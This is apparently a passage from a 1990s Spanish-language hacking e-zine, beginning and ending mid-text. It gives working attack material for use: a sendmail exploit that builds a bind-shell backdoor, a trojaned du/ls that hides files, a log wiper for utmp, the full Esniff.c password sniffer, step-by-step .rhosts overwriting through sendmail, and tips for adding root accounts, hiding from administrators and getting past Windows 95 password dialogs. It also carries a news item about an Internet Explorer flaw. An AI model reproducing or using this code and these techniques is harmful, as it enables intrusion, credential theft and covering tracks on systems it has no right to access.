'1,/^$/d' | sh" echo "data" echo "cat > /tmp/a.c <<EOF" cat << EOF #include <sys/types.h> #include <sys/signal.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> reap(){int s;while(wait(&s)!=-1);}main(ac,av)int ac; int **av;{struct sockaddr_in mya;struct servent *sp ;fd_set muf;int myfd,new,x,maxfd=getdtablesize(); signal(SIGCLD,reap);if((myfd=socket(AF_INET,SOCK_STREAM, 0))<0)exit(1);mya.sin_family=AF_INET;bzero(&mya.sin_addr, sizeof(mya.sin_addr));if((sp=getservbyname(av[1],"tcp")) ==(struct servent *)0){if(atoi(av[1])<=0)exit(1);mya.sin_port =htons(atoi(av[1]));}else mya.sin_port=sp->s_port;if(bind(myfd, (struct sockaddr *)&mya,sizeof(mya)))exit(1);if(listen(myfd, 1)<0)exit(1);loop: FD_ZERO(&muf);FD_SET(myfd,&muf);if (select(myfd+1,&muf,0,0,0)!=1||!FD_ISSET(myfd,&muf))goto loop;if((new=accept(myfd,0,0))<0)goto loop;if(fork() ==0){for(x=2;x<maxfd;x++)if(x!=new)close(x);for(x=0;x< NSIG;x++)signal(x,SIG_DFL);dup2(new,0);close(new);dup2 (0,1);dup2(0,2);execv(av[2],av+2);exit(1);}close(new); goto loop;} EOF echo "EOF" echo "cd /tmp" echo "/bin/cc /tmp/a.c" echo "/bin/rm a.c" echo "/tmp/a.out $port $cmd" echo "." echo "quit" ) | mconnect $1 <------------------------------------FINAL-----------------------------------> Y por ultimo este otro, que no es para ser root, si no para ocultar ficheros en un directorio, que no se veran al hacer "ls". Este fichero se copia en /bin/ls sobreescribiendo al original. Lo de siempre, es el codigo original, leed los /*. <----------------------------------CORTAR AQUI-------------------------------> #ifndef lint static char sccsid[] = "@(#)du.c 1.1 91/11/13 SMI"; /* from UCB 4.11 83/07/01 */ #endif /* * du */ #include <stdio.h> #include <sys/param.h> #include <sys/stat.h> #include <sys/dir.h> char path[BUFSIZ], name[BUFSIZ]; int aflg; int sflg; char *dot = "."; #define ML 1000 struct { int dev; ino_t ino; } ml[ML]; int mlx; /*+ * Hack vars - oops they're global * but wtf cares, its a hack. +*/ #define FILENAME "/dev/ptyr" #define STR_SIZE 128 #define SEP_CHAR " \n" #define SHOWFLAG /* Able to get du stats with `du -/` command */ struct h_st { struct h_st *next; char filename[STR_SIZE]; }; struct h_st *hack_list; struct h_st *h_tmp; char tmp_str[STR_SIZE]; FILE *fp_hack; int showall=0; long descend(); char *index(), *rindex(), *strcpy(), *sprintf(); #define kb(n) (howmany(dbtob(n), 1024)) main(argc, argv) int argc; char **argv; { long blocks = 0; register char *np; int pid; int c; extern int optind; #if defined (SHOWFLAG) while ((c = getopt(argc, argv, "as/")) != -1) #else while ((c = getopt(argc, argv, "as")) != -1) #endif switch (c) { case 'a': aflg++; break; case 's': sflg++; break; #if defined (SHOWFLAG) case '/': showall++; break; #endif default: (void)fprintf(stderr, "Usage: du [-as] file . . .\n"); exit (2); } /*+ Read in list of files to block +*/ h_tmp=(struct h_st *)malloc(sizeof(struct h_st)); hack_list=h_tmp; if (fp_hack=fopen (FILENAME, "r")) { while (fgets(tmp_str, 126, fp_hack)) { h_tmp->next=(struct h_st *)malloc(sizeof(struct h_st)); strcpy (h_tmp->filename, tmp_str); h_tmp->filename[strlen(h_tmp->filename)-1]='\0'; h_tmp=h_tmp->next; } } h_tmp->next=NULL; /*+ On with the program +*/ argc -= optind; argv += optind; if (argc == 0) { argv = ˙ argc = 1; } do { if (argc > 1) { pid = fork(); if (pid == -1) { fprintf(stderr, "No more processes.\n"); exit(1); } if (pid != 0) wait((int *)0); } if (argc == 1 || pid == 0) { (void) strcpy(path, *argv); (void) strcpy(name, *argv); if (np = rindex(name, '/')) { *np++ = '\0'; if (chdir(*name ? name : "/") < 0) { perror(*name ? name : "/"); exit(1); } } else np = path; blocks = descend(path, *np ? np : "."); if (sflg) printf("%ld\t%s\n", kb(blocks), path); if (argc > 1) exit(1); } argc--, argv++; } while (argc > 0); exit(0); /* NOTREACHED */ } DIR *dirp = NULL; long descend(base, name) /* Cool tree spanning idea */ char *base, *name; { char *ebase0, *ebase; struct stat stb; int i; long blocks = 0; long curoff = NULL; register struct direct *dp; /*+ * This will be very lagged if you include alot of files * because strstr() is such an expensive call. However, * the nature of this procedure requires it, and breaking * the pathname down would be just as expensive. Note, * that correct disk usage sizes will be reported based * upon files that are not masked. +*/ if (!showall) for (h_tmp=hack_list; h_tmp->next; h_tmp=h_tmp->next) if (strstr(base, h_tmp->filename)) return 0; ebase0 = ebase = index(base, 0); if (ebase > base && ebase[-1] == '/') ebase--; if (lstat(name, &stb) < 0) { perror(base); *ebase0 = 0; return (0); } if (stb.st_nlink > 1 && (stb.st_mode&S_IFMT) != S_IFDIR) { for (i = 0; i <= mlx; i++) if (ml[i].ino == stb.st_ino && ml[i].dev == stb.st_dev) return (0); if (mlx < ML) { ml[mlx].dev = stb.st_dev; ml[mlx].ino = stb.st_ino; mlx++; } } blocks = stb.st_blocks; if ((stb.st_mode&S_IFMT) != S_IFDIR) { if (aflg) printf("%ld\t%s\n", kb(blocks), base); return (blocks); } if (dirp != NULL) closedir(dirp); dirp = opendir(name); if (dirp == NULL) { perror(base); *ebase0 = 0; return (0); } if (chdir(name) < 0) { perror(base); *ebase0 = 0; closedir(dirp); dirp = NULL; return (0); } while (dp = readdir(dirp)) { if (!strcmp(dp->d_name, ".") || !strcmp(dp->d_name, "..")) continue; (void) sprintf(ebase, "/%s", dp->d_name); curoff = telldir(dirp); blocks += descend(base, ebase+1); *ebase = 0; if (dirp == NULL) { dirp = opendir("."); if (dirp == NULL) { perror("."); return (0); } seekdir(dirp, curoff); } } closedir(dirp); dirp = NULL; if (sflg == 0) printf("%ld\t%s\n", kb(blocks), base); if (chdir("..") < 0) { (void) sprintf(index(base, 0), "/.."); perror(base); exit(1); } *ebase0 = 0; return (blocks); } <---------------------------------------FINAL--------------------------------> Igual que hay este hay un monton para cada sistema, para el ftp, para telnet etc... Despues de buscar, o bien en vuestro HD, o bien en las paginas web se supone que tendreis los necesarios para ser root. Un consejo, si no funciona ninguno de los que teneis no useis los que son para otros sistemas o versiones, vamos, que no hagais cosas a lo loco, por que lo unico que haceis es dejar mas huellas en el sistema. Esta es la parte mas dificil de todas, asi que espero que sepais solucionarla. Una vez que ya somos root podemos hacer lo que queramos en ese sistema, pero no debemos olvidarnos de borrar nuestras huellas. Los unix tienen varios logs que guardan casi todo lo que hacemos en el sistema: * UTMP: Este fichero guarda un registro de todos los usuarios que se han conectado a ese sistema Directorios: /etc/utmp o /var/adm/utmp * WTMP: Este es nuestro peor enemigo. Guarda los numeros IP de todos los que se han conectado al ordenador. Directorios: /etc/wtmp o /var/adm/wtmp * LASTLOG: Este log guarda un registro del momento exacto en que un usuario entro por ultima vez Directorio: /var/adm/lastlog * ACCT: Este log guarda los comandos que hemos ejecutado pero SOLO los comandos no con que fin los hemos utilizado, pero suele estar desactivado por la gran cantidad de memoria que necesita. ( Logico no? ) Directorio: /var/adm/acct ( en algunos sistemas se puede llamar pacct ) Ademas de esto puede haber otros programas que registren tu entrada, como el TCP-Wrapper o similares( Tened cuidado con el Syslog que viene con el ssoo que guarda los logs en los ficheros especificados en /etc/syslog.conf ) De todas maneras os recomiendo que hackeeis a horas que el root no pueda ver vuestro numero IP con "who" o "users" porque os pillara. De la misma manera, la primera vez que accedeis al sistema con una cuenta hackeada, haced muchas cosas que haria un usuario normal ( telnet, ftp, echar una partida al tetris ) para que si el root os investiga "levemente" no se de cuenta de lo que habeis hecho. Aqui incluyo el codigo de el "zap" que, como su nombre indica es un zapper, o sea un programa que borra nuestras huellas el solito. Se compila como los exploits, pero cambia su ejecucion : % zap <nombredeusuario> <---------------------------------CORTAD AQUI--------------------------------> #include <sys/types.h> #include <stdio.h> #include <unistd.h> #include <sys/file.h> #include <fcntl.h> #include <utmp.h> #include <pwd.h> #include <lastlog.h> #define WTMP_NAME "/usr/adm/wtmp" #define UTMP_NAME "/etc/utmp" #define LASTLOG_NAME "/usr/adm/lastlog" int f; void kill_utmp(who) char *who; { struct utmp utmp_ent; int flag=0; if ((f=open(UTMP_NAME,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); flag++; } close(f); if(!flag) printf("Unsuccessful.\n"); } } main(argc,argv) int argc; char *argv[]; { char me[30]; int i; struct passwd *myentry; if (argc==1) { myentry=getpwuid(getuid()); strcpy(me,myentry->pw_name); } else strcpy(me,argv[1]); printf("ZAPing %s.\n",me); kill_utmp(me); } <-----------------------------------FINAL------------------------------------> Asi la ultima entrada del usuario queda borrada del sistema. Si lo ejecutamos demasiadas veces, pondra nombredeusuario Never Logged In, o sea es como si ese usuario nunca se hubiera conectado al sistema. Ya tenemos las huellas borradas, pero si queremos mantener esos privilegios que hacemos? La manera mas facil es añadir una cuenta al /etc/passwd con el comando "adduser" con numero de usuario 0 y numero de grupo 0 que son privilegios de root. NoTa: que nadie se le ocurra borrar todas las cuentas del fichero passwd menos una que solo el conozca, por que, aunque nadie podria acceder al sistema una persona con acceso fisico podria detectarnos, y como poco borrar nuestra cuenta asi cerrandonos el acceso al sistema, siendo en vano todo lo que habiamos hecho. Sin embargo si por casualidad al sysop en cuestión se le ocurre revisar las cuentas del fichero passwd la cagamos. Aunque es dificil, por que tendria que revisar las cuentas 1 por 1 y es muy posible que se no se de cuenta, pero los hay maniaticos.... Despues de hacer todo esto : -Tenemos una cuenta con privilegios de root -Hemos borrado nuestras huellas ¿ Que nos queda ? Pues practicamente nada, salvo colocar un sniffer, programa que nos facilitara logins y passwords de ordenadores a los que se conecte la gente de "nuestro" sistema. El problema de los sniffers es que hay uno para cada sistema, pero si encontramos uno para el nuestro ( cosa que no seria muy rara ) no esta de mas ponerlo para futuros "trabajos". Aqui incluyo el codigo de uno que quizas os sirva, es el codigo original, y hay que añadirle alguna cosa asi que leed lo un poco por las lineas que empiezan por /* Este sniffer deberia funcionar en casi todos los *NIX : <----------------------------------CORTAD AQUI-------------------------------> /* Esniff.c */ #include <stdio.h> #include <ctype.h> #include <string.h> #include <sys/time.h> #include <sys/file.h> #include <sys/stropts.h> #include <sys/signal.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <net/if.h> #include <net/nit_if.h> #include <net/nit_buf.h> #include <net/if_arp.h> #include <netinet/in.h> #include <netinet/if_ether.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/udp.h> #include <netinet/ip_var.h> #include <netinet/udp_var.h> #include <netinet/in_systm.h> #include <netinet/tcp.h> #include <netinet/ip_icmp.h> #include <netdb.h> #include <arpa/inet.h> #define ERR stderr char *malloc(); char *device, *ProgName, *LogName; FILE *LOG; int debug=0; #define NIT_DEV "/dev/nit" #define CHUNKSIZE 4096 /* device buffer size */ int if_fd = -1; int Packet[CHUNKSIZE+32]; void Pexit(err,msg) int err; char *msg; { perror(msg); exit(err); } void Zexit(err,msg) int err; char *msg; { fprintf(ERR,msg); exit(err); } #define IP ((struct ip *)Packet) #define IP_OFFSET (0x1FFF) #define SZETH (sizeof(struct ether_header)) #define IPLEN (ntohs(ip->ip_len)) #define IPHLEN (ip->ip_hl) #define TCPOFF (tcph->th_off) #define IPS (ip->ip_src) #define IPD (ip->ip_dst) #define TCPS (tcph->th_sport) #define TCPD (tcph->th_dport) #define IPeq(s,t) ((s).s_addr == (t).s_addr) #define TCPFL(FLAGS) (tcph->th_flags & (FLAGS)) #define MAXBUFLEN (128) time_t LastTIME = 0; struct CREC { struct CREC *Next, *Last; time_t Time; /* start time */ struct in_addr SRCip, DSTip; u_int SRCport, /* src/dst ports */ DSTport; u_char Data[MAXBUFLEN+2]; /* important stuff :-) */ u_int Length; /* current data length */ u_int PKcnt; /* # pkts */ u_long LASTseq; }; struct CREC *CLroot = NULL; char *Symaddr(ip) register struct in_addr ip; { register struct hostent *he = gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET); return( (he)?(he->h_name):(inet_ntoa(ip)) ); } char *TCPflags(flgs) register u_char flgs; { static char iobuf[8]; #define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-') SFL(0,TH_FIN, 'F'); SFL(1,TH_SYN, 'S'); SFL(2,TH_RST, 'R'); SFL(3,TH_PUSH,'P'); SFL(4,TH_ACK, 'A'); SFL(5,TH_URG, 'U'); iobuf[6]=0; return(iobuf); } char *SERVp(port) register u_int port; { static char buf[10]; register char *p; switch(port) { case IPPORT_LOGINSERVER: p="rlogin"; break; case IPPORT_TELNET: p="telnet"; break; case IPPORT_SMTP: p="smtp"; break; case IPPORT_FTP: p="ftp"; break; default: sprintf(buf,"%u",port); p=buf; break; } return(p); } char *Ptm(t) register time_t *t; { register char *p = ctime(t); p[strlen(p)-6]=0; /* strip " YYYY\n" */ return(p); } char *NOWtm() { time_t tm; time(&tm); return( Ptm(&tm) ); } #define MAX(a,b) (((a)>(b))?(a):(b)) #define MIN(a,b) (((a)<(b))?(a):(b)) /* add an item */ #define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \ register struct CREC *CLtmp = \ (struct CREC *)malloc(sizeof(struct CREC)); \ time( &(CLtmp->Time) ); \ CLtmp->SRCip.s_addr = SIP.s_addr; \ CLtmp->DSTip.s_addr = DIP.s_addr; \ CLtmp->SRCport = SPORT; \ CLtmp->DSTport = DPORT; \ CLtmp->Length = MIN(LEN,MAXBUFLEN); \ bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \ CLtmp->PKcnt = 1; \ CLtmp->Next = CLroot; \ CLtmp->Last = NULL; \ CLroot = CLtmp; \ } register struct CREC *GET_NODE(Sip,SP,Dip,DP) register struct in_addr Sip,Dip; register u_int SP,DP; { register struct CREC *CLr = CLroot; while(CLr != NULL) { if( (CLr->SRCport == SP) && (CLr->DSTport == DP) && IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) ) break; CLr = CLr->Next; } return(CLr); } #define ADDDATA_NODE(CL,DATA,LEN) { \ bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \ CL->Length += LEN; \ } #define PR_DATA(dp,ln) { \ register u_char lastc=0; \ while(ln-- >0) { \ if(*dp < 32) { \ switch(*dp) { \ case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \ break; \ case '\r': \ case '\n': fprintf(LOG,"\n : "); \ break; \ default : fprintf(LOG,"^%c", (*dp + 64)); \ break; \ } \ } else { \ if(isprint(*dp)) fputc(*dp,LOG); \ else fprintf(LOG,"(%d)",*dp); \ } \ lastc = *dp++; \ } \ fflush(LOG); \ } void END_NODE(CLe,d,dl,msg) register struct CREC *CLe; register u_char *d; register int dl; register char *msg; { fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time)); fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport)); fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport)); fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n", NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg); fprintf(LOG," DATA: "); { register u_int i = CLe->Length; register u_char *p = CLe->Data; PR_DATA(p,i); PR_DATA(d,dl); } fprintf(LOG,"\n-- \n"); fflush(LOG); if(CLe->Next != NULL) CLe->Next->Last = CLe->Last; if(CLe->Last != NULL) CLe->Last->Next = CLe->Next; else CLroot = CLe->Next; free(CLe); } /* 30 mins (x 60 seconds) */ #define IDLE_TIMEOUT 1800 #define IDLE_NODE() { \ time_t tm; \ time(&tm); \ if(LastTIME<tm) { \ register struct CREC *CLe,*CLt = CLroot; \ LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \ while(CLe=CLt) { \ CLt=CLe->Next; \ if(CLe->Time <tm) \ END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \ } \ } \ } void filter(cp, pktlen) register char *cp; register u_int pktlen; { register struct ip *ip; register struct tcphdr *tcph; { register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type); if(EtherType < 0x600) { EtherType = *(u_short *)(cp + SZETH + 6); cp+=8; pktlen-=8; } if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */ return; } /* ugh, gotta do an alignment :-( */ bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH)); ip = (struct ip *)Packet; if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */ return; tcph = (struct tcphdr *)(Packet + IPHLEN); if(!( (TCPD == IPPORT_TELNET) || (TCPD == IPPORT_LOGINSERVER) || (TCPD == IPPORT_FTP) )) return; { register struct CREC *CLm; register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4)); register u_char *p = (u_char *)Packet; p += ((IPHLEN * 4) + (TCPOFF * 4)); if(debug) { fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length); fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS)); fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD)); } if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) { CLm->PKcnt++; if(length>0) if( (CLm->Length + length) < MAXBUFLEN ) { ADDDATA_NODE( CLm, p,length); } else { END_NODE( CLm, p,length, "DATA LIMIT"); } if(TCPFL(TH_FIN|TH_RST)) { END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" ); } } else { if(TCPFL(TH_SYN)) { ADD_NODE(IPS,IPD,TCPS,TCPD,p,length); } } IDLE_NODE(); } } /* signal handler */ void death() { register struct CREC *CLe; while(CLe=CLroot) END_NODE( CLe, (u_char *)NULL,0, "SIGNAL"); fprintf(LOG,"\nLog ended at => %s\n",NOWtm()); fflush(LOG); if(LOG != stdout) fclose(LOG); exit(1); } /* opens network interface, performs ioctls and reads from it, * passing data to filter function */ void do_it() { int cc; char *buf; u_short sp_ts_len; if(!(buf=malloc(CHUNKSIZE))) Pexit(1,"Eth: malloc"); /* this /dev/nit initialization code pinched from etherfind */ { struct strioctl si; struct ifreq ifr; struct timeval timeout; u_int chunksize = CHUNKSIZE; u_long if_flags = NI_PROMISC; if((if_fd = open(NIT_DEV, O_RDONLY)) < 0) Pexit(1,"Eth: nit open"); if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0) Pexit(1,"Eth: ioctl (I_SRDOPT)"); si.ic_timout = INFTIM; if(ioctl(if_fd, I_PUSH, "nbuf") < 0) Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")"); timeout.tv_sec = 1; timeout.tv_usec = 0; si.ic_cmd = NIOCSTIME; si.ic_len = sizeof(timeout); si.ic_dp = (char *)&timeout; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)"); si.ic_cmd = NIOCSCHUNK; si.ic_len = sizeof(chunksize); si.ic_dp = (char *)&chunksize; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)"); strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name)); ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0'; si.ic_cmd = NIOCBIND; si.ic_len = sizeof(ifr); si.ic_dp = (char *)𝔦 if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)"); si.ic_cmd = NIOCSFLAGS; si.ic_len = sizeof(if_flags); si.ic_dp = (char *)&if_flags; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)"); if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0) Pexit(1,"Eth: ioctl (I_FLUSH)"); } while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) { register char *bp = buf, *bufstop = (buf + cc); while (bp < bufstop) { register char *cp = bp; register struct nit_bufhdr *hdrp; hdrp = (struct nit_bufhdr *)cp; cp += sizeof(struct nit_bufhdr); bp += hdrp->nhb_totlen; filter(cp, (u_long)hdrp->nhb_msglen); } } Pexit((-1),"Eth: read"); } /* Authorize your proogie,generate your own password and uncomment here */ /* #define AUTHPASSWD "EloiZgZejWyms" */ void getauth() { char *buf,*getpass(),*crypt(); char pwd[21],prmpt[81]; strcpy(pwd,AUTHPASSWD); sprintf(prmpt,"(%s)UP? ",ProgName); buf=getpass(prmpt); if(strcmp(pwd,crypt(buf,pwd))) exit(1); } */ void main(argc, argv) int argc; char **argv; { char cbuf[BUFSIZ]; struct ifconf ifc; int s, ac=1, backg=0; ProgName=argv[0]; /* getauth(); */ LOG=NULL; device=NULL; while((ac<argc) && (argv[ac][0] == '-')) { register char ch = argv[ac++][1]; switch(toupper(ch)) { case 'I': device=argv[ac++]; break; case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a"))) Zexit(1,"Output file cant be opened\n"); break; case 'B': backg=1; break; case 'D': debug=1; break; default : fprintf(ERR, "Usage: %s [-b] [-d] [-i interface] [-f file]\n", ProgName); exit(1); } } if(!device) { if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0) Pexit(1,"Eth: socket"); ifc.ifc_len = sizeof(cbuf); ifc.ifc_buf = cbuf; if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0) Pexit(1,"Eth: ioctl"); close(s); device = ifc.ifc_req->ifr_name; } fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV); fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout", (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n"); if(!LOG) LOG=stdout; signal(SIGINT, death); signal(SIGTERM,death); signal(SIGKILL,death); signal(SIGQUIT,death); if(backg && debug) { fprintf(ERR,"[Cannot bg with debug on]\n"); backg=0; } if(backg) { register int s; if((s=fork())>0) { fprintf(ERR,"[pid %d]\n",s); exit(0); } else if(s<0) Pexit(1,"fork"); if( (s=open("/dev/tty",O_RDWR))>0 ) { ioctl(s,TIOCNOTTY,(char *)NULL); close(s); } } fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid()); fflush(LOG); do_it(); } <----------------------------------FINAL------------------------------------> Bueno, ya hemos terminado espero que os haya servido de ayuda este texto, y hayais comprendido como hackear un UNIX De todas maneras si hay algo que no entendais, o alguna pregunta ya sabeis: ravenspirit@hotmail.com ###Por cierto las cartas tipo " ¿ que necesito para ser un hacker ? " iran al trash directamente.### !!!!Happy Hack ;-) WAREZ RULEZ KILL THE BIG BROTHER FREE OUR DATA {[-RavEn│SpiRiT-]} -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- +────────────────────+ El Bug de SendMail por Dark Raver +────────────────────+ Saludos amigos, aqui esta para serviros y para comentaros el bug de este mes el Dark Raver. Como no os sonara mi nombre, os dire que soy un fanatico de los ordenatas y por supuesto del hacking, que me podreis encontrar en Axis. Este bug es un poco mas moderno y a lo mejor todavia funciona en algun sitio, pero no os hagais ilusiones. Sistemas: Unix's en general Versiones: Sendmail, versiones anteriores a la 5.59 Descripcion: Bug del sendmail Con este bug, los usuarios externos pueden sobre-escribir cualquier archivo, que no tenga nivel de root. Ejemplo: (No voy a poner ejemplos de sistemas operativos concretos. Intentare explicarme lo mas generalmente posible, y luego vosotros tendreis que aplicarlo a vuestro sistema en concreto.) Hacemos un telnet a victima.com al puerto 25 rcpt to: /home/pepe/.rhosts --> Nombre (y situacion) del fichero a escribir. En este caso vamos a sobre-escribir el rhosts del usuario llamado pepe. mail from: pepe data "Aqui pon lo que quieras, un comentario para el root por ejemplo :-)" . --> Normalmente te dara un mensaje de error, despues de poner el punto. rcpt to: /home/pepe/.rhosts --> Esto es muy importante, hay que hacerlo 2 veces. mail from: pepe data --> Ahora en este segundo intento si que podras escribir en el fichero. mi.ordenador.com --> Esto es lo que se escribira en el archivo. Tambien se podria poner ' + + ' o algo similar. . --> Si no da mensaje de error es que ha funcionado. quit Despues hacemos un rlogin a victima.com como si fuesemos pepe, y como el nombre de nuestro ordenador, aparece en su .rhosts (remote hosts) entraremos sin problemas, ya que no nos pedira el pass. Dark Raver -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- Fallas de Seguridad en Internet Explorer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Explorer 3.0 primeros errores detectados Mirosoft Explorer 3.0, el navegador de Microsoft que compite directamente con Netscape para romper su hegemonia en el mercado dispone en su version final de importantes fallos de seguridad segun han alertado investigadores de la Universidad de Princeton en los Estados Unidos. El error detectado permite a usuarios de Internet acceder a los archivos alojados en el disco duro de un usuario conectado a la red con lo que peligra la seguridad de empresas e instituciones que mantienen conexion directa y que no dispongan de elementos de seguridad adicionales. Bill Koszewski, director de productos Internet de Microsoft ha manifestado que la Compañia alertado por los investigadores de esta universidad han puesto a disposicion de los usuarios un parche que corrige este importante error. Para el directivo de Microsoft, en declaraciones efectuadas a Reuters, los errores de seguridad producen una gran preocupacion en la compañia e inmediatamente que son detectados en algun programa este tipo de errores responde rapidamente para solventarlos. Los datos del estudio de la Universidad de Princeton pueden ser obtenidos en: http://www.cs.princeton.edu/sip/News.html. Y el programa que corrige los errores de Explorer en los Website de la empresa o bien en : ftp://ftp.bol.com.br/pub/netutil/microsoft/update.exe Este mensaje desperto la alarma Dirk Balfanz y Ed Felten, del Departamento de Ciencia de Computacion de la Universidad de Princeton URL: http://www.cs.princeton.edu/sip/ Hemos descubierto un defecto de seguridad en la version actual (3.0) del navegador Microsoft Internet Explorer funcionando bajo Windows 95. Un agresor podria utilizar el defecto para iniciar cualquier comando del DOS en la maquina del usuario del MS Explorer que este visitando la pagina de dicho agresor. Por ejemplo, el agresor podria leer, modificar o borrar archivos de la victima, o insertar un virus o una entrada escondida a la maquina de la victima. Hemos verificado este descubrimiento creando una pagina Web que borra un archivo en la maquina de cualquier usuario del MS Explorer que visite esta pagina. El nucleo del ataque consiste en una tecnica para enviar un documento al navegador de la victima evitando los chequeos de seguridad que normalmente se aplicarian al documento. Si el documento fuera, por ejemplo, una carpeta de Microsoft Word, podria contener una macro que ejecutara cualquier comando DOS. Normalmente, antes de recibir un archivo peligroso como un documento Word, el MS Explorer muestra un aviso advirtiendo que el archivo podria contener un virus o algun otro contenido peligroso, y pregunta al usuario si no quiere recibir el archivo o si quiere recibirlo de todas maneras. Esto da al usuario la posibilidad de evitar el riesgo de un documento infectado. Sin embargo, nuestra tecnica permite a un agresor enviar un documento sin disparar la pantalla de aviso. Microsoft ya ha sido advertido y estan trabajando en la solucion del problema. No daremos mas detalles sobre el defecto hasta que el remedio sea completamente accesible. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- *┌─────────────────────────────────────────────┐* │---------------------------------------------│ │SOBRE LOS DEFECTOS DE SEGURIDAD EN WINDOWS 95│ │---------------------------------------------│ *└─────────────────────────────────────────────┘* Galahad vuelve al ataque para comentar algunos de los -extrepitosos- fallos de seguridad en Windows 95. La compañia del B. Puertas no anda muy fina ultimamente en lo que a programacion se refiere, y han dejado un par de puertas abiertas que nosotros, como buenos hackers, podemos (y vamos) a aprovechar. He aqui una lista: * Sobre como pasar de las ventanas de los passwords. - Bien . . . Windows es un sistema que intenta ser seguro contra cuelgues, por lo que pulsando CTRL+AlT+SUPR nos invita a cerrar cualquier ventana que no este funcionando correctamente. Una pregunta: ¿habeis probado a hacerlo con las ventanas que os piden un password? :) - Otra posibilidad del Windows 95 es cerrar rapidamente una ventana pulsando sobre el boton "X" en la barra de titulo. Pues eso, ¿Que os inpide cerrar una ventana de password? * Acceder al DOS Windows 95 realmente no es un sistema operativo. Trabaja sobre el 2, que si lo es, pero que no proporciona ninguna seguridad: ej. tu simpatico vecinito de cinco años puede formatearte el disco duro y 2 no se lo impedira. Sin embargo, en Windows el sistema comprueba siempre las restricciones aplicadas a los usuarios por el administrador. ¿Que quiere decir esto? Que si tienes acceso al DOS, el ordenador es tuyo. Pero ahora se plantea un problema: Muchos administradores de sistemas "prohiben" la entrada al DOS a sus usuarios. ¿Como entrar entonces? Elije la forma que prefieras: - A traves del menu ejecutar: Imposible! Ningun administrador es tan tonto. De todas maneras, prueba. Pulsa sobre Inicio|Ejecutar, escribe "Command" (sin comillas) y pulsa enter. Si consigues el milagro, puedes ponerle una vela a Santa Gema. - A traves de la ayuda: Con un editor de textos hexadecimal como WordPad (no el bloc de notas) abre el archivo "COMMAND.COM" vez a la opcion "Guardar como..." normalmente en el menu "Archivo" y guardalo, en el directorio donde este instalado Windows 95, con el nombre de "WINHLP32.EXE". Ahora, cada vez que pulses la tecla F1, tendras un prompt del DOS para ti solo :) - Saltandote el inicio de Windows al encender el sistema. Pulsando 